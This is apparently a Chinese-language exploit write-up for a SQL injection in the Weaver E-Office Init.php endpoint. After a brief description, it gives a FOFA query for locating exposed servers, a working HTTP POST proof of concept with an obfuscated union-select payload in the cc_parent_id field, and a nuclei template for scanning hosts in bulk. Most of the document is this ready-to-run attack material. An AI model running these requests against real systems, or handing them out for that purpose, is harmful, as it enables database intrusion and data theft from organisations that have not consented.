泛微E-Office init.php SQL注入漏洞
漏洞简介
泛微 E-Office 协同办公平台/E-mobile/App/Init.php
接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改;
漏洞复现
fofa语法:app="泛微-EOffice"
登录页面如下:
POC:
POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 60
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#
nuclei批量yaml文件
id: fanwei_eoffice_init_sqli
info:
name: 泛微 E-Office协同办公平台Init.php SQL注入漏洞
author: mhb17
severity: critical
description: description
reference:
- https://
tags: sqli
requests:
- raw:
- |-
POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#
matchers-condition: and
matchers:
- type: word
part: body
words:
- CC_VALUE
- type: word
part: body
words:
- CC_NAME
- type: word
part: header
words:
- '200'